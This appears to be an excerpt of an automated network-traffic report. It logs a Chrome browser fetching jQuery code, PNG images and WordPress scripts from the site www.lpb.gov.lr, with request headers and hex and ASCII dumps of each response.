                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 6e 6f 77 3d 74 68 69 73 2e 63 75 72 28 29 2c 74 68 69 73 2e 65 6e 64 3d 72 2c 74 68 69 73 2e 75 6e 69 74 3d 6f 7c 7c 28 63 65 2e 63 73 73 4e 75 6d 62 65 72 5b 6e 5d 3f 22 22 3a 22 70 78 22 29 7d 2c 63 75 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 74 2e 70 72 6f 70 48 6f 6f 6b 73 5b 74 68 69 73 2e 70 72 6f 70 5d 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 67 65 74 3f 65 2e 67 65 74 28 74 68 69 73 29 3a 61 74 2e 70 72 6f 70 48 6f 6f 6b 73 2e 5f 64 65 66 61 75 6c 74 2e 67 65 74 28 74 68 69 73 29 7d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 61 74 2e 70 72 6f 70 48 6f 6f 6b 73 5b 74 68 69 73 2e 70 72 6f 70 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64
                                                                                                                        Data Ascii: is.start=this.now=this.cur(),this.end=r,this.unit=o||(ce.cssNumber[n]?"":"px")},cur:function(){var e=at.propHooks[this.prop];return e&&e.get?e.get(this):at.propHooks._default.get(this)},run:function(e){var t,n=at.propHooks[this.prop];return this.options.d
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 63 65 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 63 65 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 63 65 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 63 65 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 6d 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 63 65 2e 72 65 6d 6f 76 65 41 74 74 72 28 65 2c 74 29 3a 69 26 26 22 73 65 74 22 69 6e 20 69 26 26 76 6f 69 64 20 30 21 3d 3d 28 72 3d 69 2e 73 65 74 28 65 2c 6e 2c 74 29 29 3f 72 3a 28 65 2e 73 65 74 41 74
                                                                                                                        Data Ascii: &2!==o)return"undefined"==typeof e.getAttribute?ce.prop(e,t,n):(1===o&&ce.isXMLDoc(e)||(i=ce.attrHooks[t.toLowerCase()]||(ce.expr.match.bool.test(t)?mt:void 0)),void 0!==n?null===n?void ce.removeAttr(e,t):i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:(e.setAt
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 69 73 61 62 6c 65 64 22 29 26 26 4f 74 2e 74 65 73 74 28 74 68 69 73 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 21 48 74 2e 74 65 73 74 28 65 29 26 26 28 74 68 69 73 2e 63 68 65 63 6b 65 64 7c 7c 21 77 65 2e 74 65 73 74 28 65 29 29 7d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 63 65 28 74 68 69 73 29 2e 76 61 6c 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 75 6c 6c 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 63 65 2e 6d 61 70 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 65 2e 72 65 70 6c 61 63 65 28 4c 74 2c 22 5c 72 5c 6e 22 29 7d 7d 29 3a 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 6e 2e 72 65 70 6c 61 63 65 28 4c 74
                                                                                                                        Data Ascii: isabled")&&Ot.test(this.nodeName)&&!Ht.test(e)&&(this.checked||!we.test(e))}).map(function(e,t){var n=ce(this).val();return null==n?null:Array.isArray(n)?ce.map(n,function(e){return{name:t.name,value:e.replace(Lt,"\r\n")}}):{name:t.name,value:n.replace(Lt


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        25192.168.2.74979769.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC397OUTGET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC358INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 09:26:19 GMT
                                                                                                                        ETag: "44-60e94060daa93"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 68
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:47 UTC68INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0b 49 44 41 54 18 57 63 60 60 00 00 00 03 00 01 68 26 59 0d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                        Data Ascii: PNGIHDRIDATWc``h&YIENDB`


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        26192.168.2.74979869.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC375OUTGET /wp-content/uploads/2024/01/logo-1.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC365INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 17 Jan 2024 14:51:58 GMT
                                                                                                                        ETag: "49c61-60f2563892bfc"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 302177
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:47 UTC7827INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 ae 00 00 01 9a 08 06 00 00 00 57 1e a7 21 00 00 00 09 70 48 59 73 00 00 0b 89 00 00 0b 89 01 37 c9 cb ad 00 00 19 d7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                        Data Ascii: PNGIHDRW!pHYs7iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 44 08 0c 82 8b c0 e9 e0 59 d7 31 0f 75 57 d5 33 c1 a4 c7 85 40 07 bc 04 ab 90 1e 21 03 32 2a f1 5e a0 f0 22 78 4f e3 00 09 c1 1b 6c 70 c8 5a a3 42 84 52 0a 21 24 89 36 18 13 81 94 08 2f 88 9d 26 12 11 33 02 24 8a 48 28 8c 85 20 3d 33 5b 91 ea 08 14 34 72 ae 18 91 f5 80 a5 f4 0d b5 0c 38 19 08 de 21 1a 8b ab 0b 42 70 04 61 71 58 3c 10 84 02 1f 08 2a 60 fa 3c 26 a5 7f 2c 84 06 1d 3c 21 04 3c 12 9c 0c d2 4b 2f 9c 9a 86 46 5c 71 33 f1 3a 81 37 80 cb 08 76 10 6c 22 78 0b 41 89 58 48 d7 82 f7 3e 0b e1 5a f0 1e 42 cc 77 3e 21 80 03 02 bd e0 c3 4f 48 2b 3f 82 71 4b e2 e4 2c 6e a9 90 48 63 ce 0a 25 3a 81 42 20 a7 a9 57 64 b5 0b 12 40 7e 6f d9 f6 12 81 44 d6 f3 a3 9c 44 a7 0c bb 6b 74 d2 15 5c 23 10 22 c6 49 c9 4a b2 ca 72 bc 0c 02 42 90 2c 0d 87 20 23 ca c6 91 e9
                                                                                                                        Data Ascii: DY1uW3@!2*^"xOlpZBR!$6/&3$H( =3[4r8!BpaqX<*`<&,<!<K/F\q3:7vl"xAXH>ZBw>!OH+?qK,nHc%:B Wd@~oDDkt\#"IJrB, #
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 92 6a 3e 34 2b a0 9d b4 19 b6 86 14 ae 66 94 8f 89 1a 4f af dd a6 d7 ea 60 cb 8a ed c9 3e 9d 54 93 68 83 b3 1e 2d 24 4b ed 3e 59 94 71 fb f6 6b 6c 4e ae 90 87 09 dd 54 a0 84 c1 c6 1a 23 1c 22 18 94 33 04 61 f0 a2 64 67 72 83 cf bc f1 2b 9c 38 71 3f ef 3b f9 13 2c cb 1e 51 02 c6 24 5c b9 bd 45 e9 04 b1 49 51 2e e0 ac a7 97 b4 38 d1 5b e6 5a 7e 80 32 3d ba ed 75 36 f3 eb 20 25 20 10 47 13 bf d6 4a 2a 2a ea ea 90 25 25 d1 71 9f ad 02 ca 00 71 26 29 ec 6d b6 76 2f 31 9a 8d e7 33 66 40 08 0a 8f c0 36 35 06 48 d2 55 ea a8 c5 a8 29 48 55 c4 46 6b 48 a4 0c 3b f9 88 49 35 03 29 28 7d 45 73 24 26 08 77 f4 3e 10 ac e1 c4 ca 3d a4 5a 83 83 e0 3d 5a 2a 0c b0 37 be cd b8 da 65 d0 e9 d0 6e 24 6f be f2 4d 76 f3 6b 10 1c da 2b 1a 17 d0 2a e3 e4 da 05 b6 b6 6e e3 9d 9b bf
                                                                                                                        Data Ascii: j>4+fO`>Th-$K>YqklNT#"3adgr+8q?;,Q$\EIQ.8[Z~2=u6 % GJ**%%qq&)mv/13f@65HU)HUFkH;I5)(}Es$&w>=Z=Z*7en$oMvk+*n
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 8f 22 38 81 17 a0 45 4c b0 15 af dd 7e 8e 7f f1 d5 7f c8 a7 3f f8 5f d2 51 eb 8c 66 53 ac 52 48 6d 48 44 86 11 19 73 1f 8e a3 24 cd e0 99 1f e8 59 0a 7b c0 f6 e4 36 b7 f3 7d e2 a8 85 d3 70 38 39 e0 58 b6 ce bd a7 3f c0 4b 3b 7f c8 cd ed b7 69 f7 25 01 07 de cc 77 1e 1e 34 1e 19 5b 5e bd fc 05 1e 5c 7f 8a f6 72 46 c6 10 9d 4a f2 66 8a f7 12 81 9e 9b cb 0a 8f 53 96 0a 4f 9a 44 34 de b3 55 e4 94 4d 45 43 cc ea f0 04 3b e5 14 69 1b a4 d0 f3 a6 0c 04 be 84 b5 ce 79 56 7b e7 10 c2 b0 37 1d b1 3f db 61 6a c7 c8 e0 50 47 37 90 3f da fd 08 15 33 b6 05 53 59 53 47 8e 59 95 73 98 cf 9d dd 6f cf be cb 77 af 7d 86 d9 64 9b 56 2b a6 09 1a 25 34 3e 30 9f c9 92 8e 48 40 a4 0c 5f 78 e9 9f 53 1c dc 60 30 b8 c0 60 e9 3c 91 88 c8 5d 89 75 47 c9 d7 c2 cf 4f 34 99 77 85 56 65
                                                                                                                        Data Ascii: "8EL~?_QfSRHmHDs$Y{6}p89X?K;i%w4[^\rFJfSOD4UMEC;iyV{7?ajPG7?3SYSGYsow}dV+%4>0H@_xS`0`<]uGO4wVe
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 71 df 18 a4 d0 fd b2 23 3c 46 f4 de a9 c8 c5 dc 37 7c 90 51 74 83 a7 1f ff 66 1e bf f2 7e 26 62 8f 69 3e e2 e6 6b c7 88 c9 90 eb 97 9e 64 7b eb 5e 8e 4f 4e 19 a7 16 69 22 9c 00 e1 05 a1 0c 68 7d c5 4b 47 5f e0 95 c3 df e0 fa e0 06 69 70 99 c5 ea 9c 5b 67 af d0 76 0d b2 0b 18 ab 1d b2 30 21 cb c6 6c 4d 1f 65 2b b9 97 f7 3d f2 21 c2 7a 8b d6 1a 88 e0 b8 2c b8 b9 5c 32 2f ce 98 0e b6 10 81 e4 7c 73 4c 53 b4 68 11 22 84 23 8e 34 4a 29 9c 0f e9 7c cb f1 fa 1c 59 1a 5a 03 51 9e a1 08 58 d6 35 77 57 27 2c 56 0b c2 f1 90 50 87 d4 a6 c2 49 c9 69 53 e2 d6 47 a8 ce 13 28 c5 68 30 60 be 5e 71 5a d5 b4 6d 47 6b 3a 86 32 24 74 12 63 2c 04 9a f3 72 4d d9 d4 c4 5e 30 89 33 72 1d 72 da b6 9c ae cf 51 b2 f7 35 0d e2 98 42 28 a4 e8 9b de a2 58 e1 84 c3 d5 2d 3b b3 2d 3a 6b
                                                                                                                        Data Ascii: q#<F7|Qtf~&bi>kd{^ONi"h}KG_ip[gv0!lMe+=!z,\2/|sLSh"#4J)|YZQX5wW',VPIiSG(h0`^qZmGk:2$tc,rM^03rrQ5B(X-;-:k
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: df 5e 32 b7 7f b5 f5 76 e3 fa 9f ab 7e 0a 77 55 25 fe c7 f4 7e fb 47 5a 64 32 f6 7b bc ef de ef e4 3b 9f f9 c3 3c 9e 3e 89 40 a0 2e 82 fe c6 d9 90 51 96 e3 f1 28 54 3f b7 4f 34 56 08 ea b6 e4 7a bc cd 63 7b 8f f0 ca d9 94 a2 5a a2 50 48 04 52 80 b2 bd 92 51 86 70 67 fe 1a ff e8 f3 7f 9b d9 07 af f1 c8 ee d3 4c e5 84 00 30 be e1 e6 f9 57 98 af de c0 fa 16 ad fb 46 e0 84 45 38 c1 84 21 4f 5d 7e 86 47 76 ee 61 9a 48 20 01 1c 61 3a c5 a6 02 81 47 d3 87 af 4f a2 11 1f 7c e2 db f9 e2 ed 5f e1 8d f9 0a 19 f4 e0 db 56 b6 a8 0e b4 54 fd 28 a9 f6 88 a6 06 3d 60 90 0f b1 4d c1 98 90 4b f9 88 cb a3 ad fe 9e c0 59 74 90 10 87 09 16 50 78 42 24 26 f6 68 02 82 52 33 f6 09 83 d1 80 41 90 10 e2 91 5e 12 a5 43 26 69 8e 14 b2 0f 65 c4 93 c6 39 9d b3 b4 9d e1 72 3e e5 f2 f8
                                                                                                                        Data Ascii: ^2v~wU%~GZd2{;<>@.Q(T?O4Vzc{ZPHRQpgL0WFE8!O]~GvaH a:GO|_VT(=`MKYtPxB$&hR3A^C&ie9r>
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 7e 71 ed 44 c3 bc 6d 30 9b 53 0e ce 5e e1 6b 37 7f 95 cf c5 fb ec cd 1e e4 da ee 7d 3c 38 7b 90 fb 67 ef 60 3a bc 81 0c c6 e4 c1 80 69 9a 63 a3 0c a9 c4 9b 89 54 cb 7a c5 e9 aa 62 7f 76 85 54 f6 77 29 45 55 51 d5 25 59 96 b3 b3 bd 4d a4 23 d4 c5 c9 b2 b5 86 93 cd 8a d6 59 f6 87 53 02 fa 85 79 59 15 94 5d c5 fe 70 c6 b6 88 88 2f 36 0e 5e 40 e1 0c 77 96 c7 8c d2 01 b3 68 80 92 82 d6 18 8e d6 73 62 a5 18 65 39 51 18 f7 ef 2e d9 83 7f 17 e5 86 75 53 32 c9 c7 44 71 7f b7 d5 98 96 a3 93 63 86 d3 29 83 3c c7 59 47 87 23 10 8a c2 14 fc dc 97 7e 9a 4f bd fa 49 1a e1 49 65 82 72 0e 23 2c 4e 49 b4 90 74 5d 05 3e e0 9d 37 be 91 8f 3e fe 03 8c e2 1d ce 16 0b 3a d9 b1 37 dc c6 01 06 cf c1 fc 84 20 0c 99 0c 27 84 3a 44 a3 71 78 14 92 a2 a9 d9 b4 15 83 7c 44 2e 34 1a 41
                                                                                                                        Data Ascii: ~qDm0S^k7}<8{g`:icTzbvTw)EUQ%YM#YSyY]p/6^@whsbe9Q.uS2Dqc)<YG#~OIIer#,NIt]>7>:7 ':Dqx|D.4A
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 05 f5 ea 04 23 14 97 c7 7b 34 42 50 e3 88 7c 4d 5b 5a 6c 27 e9 c4 88 b7 3d f4 21 4e ea 23 3e fe fc 6f f2 ce c7 7e 80 b7 5f ff 00 fb a3 37 d1 05 68 44 c3 c6 6e a9 5d c7 a6 ae a9 db 0a 23 35 a3 6c 40 50 92 85 ad 70 cb 43 8c 54 0c b2 9c 24 4a 69 08 d8 d0 e1 9c a4 aa 36 b4 4d cb 28 4a d9 4d 06 f8 10 38 0f 0d 8b e2 14 11 02 07 26 c7 25 11 65 db 32 70 8e aa ab 29 b6 1b da ae 25 36 31 fb d3 1d 0a 5f b3 29 2d 26 28 64 36 40 e7 86 db dd cb 7c f2 8b 9f e0 f3 b7 7f 8b 97 cf 3e c6 7c fd 0a 44 1e 2f 2d b6 11 34 b5 22 57 33 ee dd 7f 80 b7 5e 7f 82 77 3f f8 4d 18 77 95 fd c1 4d 86 62 9f c3 ed 8a a6 9a a3 65 c3 c1 74 0f 6f 60 b9 ad 39 9f 57 0c 74 bf e0 a8 82 a7 c2 e3 82 45 f9 9a a2 28 60 5d 30 18 8e 18 8c 26 54 0a ee d6 1b ba 53 c7 be c9 19 4f 66 34 40 69 1b 5a df 51 95
                                                                                                                        Data Ascii: #{4BP|M[Zl'=!N#>o~_7hDn]#5l@PpCT$Ji6M(JM8&%e2p)%61_)-&(d6@|>|D/-4"W3^w?MwMbeto`9WtE(`]0&TSOf4@iZQ
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 02 52 49 2e 0d 26 b4 c1 73 52 17 74 cd 92 49 d7 b0 3b 9e 52 7a 8f 0d 9e ce 77 ac ca 0a 6f 03 b2 f5 0c e3 0c 1d 09 4e b7 e7 9c 95 15 d7 76 1e e5 5b be e6 06 d7 f6 de c8 2f 3f fd 93 7c e2 ee af d3 75 1d 2a 17 54 4d cb c7 5f fb 75 d6 cd 92 6f b0 27 ec 0f df c8 6e f4 10 ed ba 45 44 1d 3e 52 14 be 23 41 b1 ad 2a 6a 51 50 36 35 83 a0 18 0f 47 34 0a 36 5d 4b 57 ad 69 f1 a4 28 e2 38 a5 72 2d 5e f6 60 e2 b3 62 85 04 26 32 66 6a 26 34 c1 31 6f b7 54 ae a5 6c 73 d2 7c d0 c3 9e 83 67 db 36 54 78 56 a1 45 36 fd 6e 55 44 11 5b 19 d8 b6 1b fc 56 91 58 98 cc 66 54 c1 61 42 bf fb 99 2f 16 04 dd e3 c6 ae 0d 77 71 02 96 be e2 ac 76 6c eb 92 cb 83 1d 02 9a b5 9d f3 f4 e1 6f f1 d9 3b 3f c7 c7 9f fe 39 9c 6c 88 c7 31 89 4c fb df 45 8f 91 02 4d 08 82 ce 39 5c 90 24 69 ca cc 3c
                                                                                                                        Data Ascii: RI.&sRtI;RzwoNv[/?|u*TM_uo'nED>R#A*jQP65G46]KWi(8r-^`b&2fj&41oTls|g6TxVE6nUD[VXfTaB/wqvlo;?9l1LEM9\$i<
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 51 c2 62 b5 24 9d 8c 59 b7 15 87 f3 d3 1e 7f 66 6b f2 34 67 de 15 9c d6 1b b6 5d d3 5b 19 94 60 51 6e 30 91 c1 ca c0 49 bd e1 a4 5c b1 ac 36 a0 04 91 8a 98 57 5b 8e cb 15 b5 70 2c ca 0d 69 9a b3 dd 6c 51 4a e2 63 c5 8b e7 87 2c 7d cb a2 2a d8 cf 2e 31 1e ec 71 ab b8 c3 e7 6e 7f 8e 38 f1 28 22 82 0c 48 7c af dc 95 81 eb e3 47 78 f7 03 3f cc d7 3f fc 43 3c b8 f7 66 84 52 2c 95 c5 fb 96 f9 ea 98 6d d8 12 1b 8d e9 02 a7 e5 09 b7 4e 9e e1 73 77 7f 83 27 8f 3f c6 71 7d 1b 8c 45 4a 90 04 54 88 f0 f4 78 aa 2c ce 79 fc d2 7b d9 1b 3f c0 51 db 70 b8 39 a3 ea 6a bc 0c 78 2d 79 e1 f4 2e 8d 09 d4 de d2 b6 1d 71 92 d0 06 45 1a 45 dc 3e 7c 9e f3 ea 18 93 b2 13 1a 6f db 26 7c 0a 78 7d f9 7f ff c6 f1 e7 bf fb 0f f8 c4 f5 b7 7f e6 3f e9 e9 c6 af f3 49 9f 71 b5 93 0d cd ff
                                                                                                                        Data Ascii: Qb$Yfk4g][`Qn0I\6W[p,ilQJc,}*.1qn8("H|Gx??C<fR,mNsw'?q}EJTx,y{?Qp9jx-y.qEE>|o&|x}?Iq


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        27192.168.2.74980669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC569OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:48 UTC368INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Tue, 02 Apr 2024 20:43:58 GMT
                                                                                                                        ETag: "23b5-615232a51cfcc"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 9141
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7824INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f 5e 5b 5e 5c 78 32
                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x2
                                                                                                                        2025-01-10 13:54:48 UTC1317INData Raw: 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 7d 72 65 74 75 72 6e 7b 67 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 6e 2e 64 61 74 61 5b 74 5d 2c 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 73 2c 61 64 64 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 7b 6e 2e 64 61 74 61 5b 65 5d 3d 7b 2e 2e 2e 6e 2e 64 61 74 61 5b 65 5d 2c 2e 2e 2e 74 2c 22 22 3a 7b 2e 2e 2e 68 2c 2e 2e 2e 6e 2e 64 61 74 61 5b 65 5d 3f 2e 5b 22 22 5d 2c 2e 2e 2e 74 3f 2e 5b 22 22 5d 7d 7d 2c 64 65 6c 65 74 65 20 6e 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 5b 65 5d 2c 61 28 29 7d 2c 72 65 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 2c 65 29 3d 3e 7b 6e 2e 64 61 74 61 3d 7b 7d 2c 6e 2e 70 6c 75 72 61 6c 46 6f 72
                                                                                                                        Data Ascii: ","core/i18n",t)}return{getLocaleData:(t="default")=>n.data[t],setLocaleData:s,addLocaleData:(t,e="default")=>{n.data[e]={...n.data[e],...t,"":{...h,...n.data[e]?.[""],...t?.[""]}},delete n.pluralForms[e],a()},resetLocaleData:(t,e)=>{n.data={},n.pluralFor


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        28192.168.2.74980569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC581OUTGET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:48 UTC369INHTTP/1.1 200 OK
